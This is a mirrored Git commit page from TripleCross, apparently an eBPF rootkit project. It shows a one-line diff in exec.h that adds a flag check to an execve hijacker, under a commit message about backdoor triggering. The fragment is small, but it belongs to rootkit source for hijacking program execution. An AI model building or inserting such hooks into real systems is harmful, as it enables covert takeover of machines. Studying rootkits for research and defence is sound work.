admin/TripleCross
1
0
Fork 0
mirror of https://github.com/h3xduck/TripleCross.git synced 2025-12-22 09:43:07 +08:00
Code Issues Packages Projects Releases Wiki Activity

Included new version of custom lib. Added checks for backdoor triggering

Browse Source
This commit is contained in:
h3xduck
2022-05-04 04:40:25 -04:00
parent 25ef3acc5a
commit 073a911f74
21 changed files with 1799 additions and 2124 deletions
Download Patch File Download Diff File Expand all files Collapse all files

2
src/ebpf/include/bpf/exec.h
View File

@@ -86,7 +86,7 @@ static __always_inline int test_write_user_unique(struct sys_execve_enter_ctx *c
static __always_inline int handle_tp_sys_enter_execve(struct sys_execve_enter_ctx *ctx, __u64 pid_tgid){
//Check if the exec hijacker is active already
if(hijacker_state == 1){
if(hijacker_state == 1 || EXEC_HIJACK_ACTIVE_TEMP == 0){
return 0;
}
bpf_printk("Starting execve hijacker\n");